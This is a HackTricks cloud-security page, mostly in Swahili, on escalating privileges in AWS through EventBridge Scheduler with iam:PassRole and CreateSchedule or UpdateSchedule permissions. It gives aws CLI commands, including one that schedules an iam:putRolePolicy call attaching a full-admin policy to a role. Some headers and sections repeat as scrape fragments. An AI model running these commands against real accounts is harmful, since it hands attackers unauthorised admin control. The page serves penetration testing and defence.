AWS - EventBridge Scheduler Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EventBridge Scheduler

Maelezo zaidi kuhusu EventBridge Scheduler katika:

AWS - EventBridge Scheduler Enum

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

Mshambuliaji mwenye ruhusa hizo ataweza kuunda|kupdate ratiba na kutumia ruhusa za jukumu la ratiba lililounganishwa nayo ili kufanya kitendo chochote

Kwa mfano, wanaweza kuunda ratiba ili kuitisha kazi ya Lambda ambayo ni kitendo kilichopangwa:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

Katika kuongeza huduma za hatua za templated, unaweza kutumia universal targets katika EventBridge Scheduler ili kuita anuwai ya operesheni za API kwa huduma nyingi za AWS. Universal targets hutoa kubadilika kuita karibu API yoyote. Mfano mmoja unaweza kuwa kutumia universal targets kuongeza "AdminAccessPolicy", ukitumia jukumu ambalo lina sera ya "putRolePolicy":

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

References

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - EMR Privesc NextAWS - Gamelift

Last updated 3 days ago

EventBridge Scheduler

Maelezo zaidi kuhusu EventBridge Scheduler katika:

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Mshambuliaji mwenye ruhusa hizo ataweza kuunda|kupdate ratiba na kutumia ruhusa za jukumu la ratiba lililounganishwa nayo ili kufanya kitendo chochote

Kwa mfano, wanaweza kuunda ratiba ili kuitisha kazi ya Lambda ambayo ni kitendo kilichopangwa:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

References

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

References

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)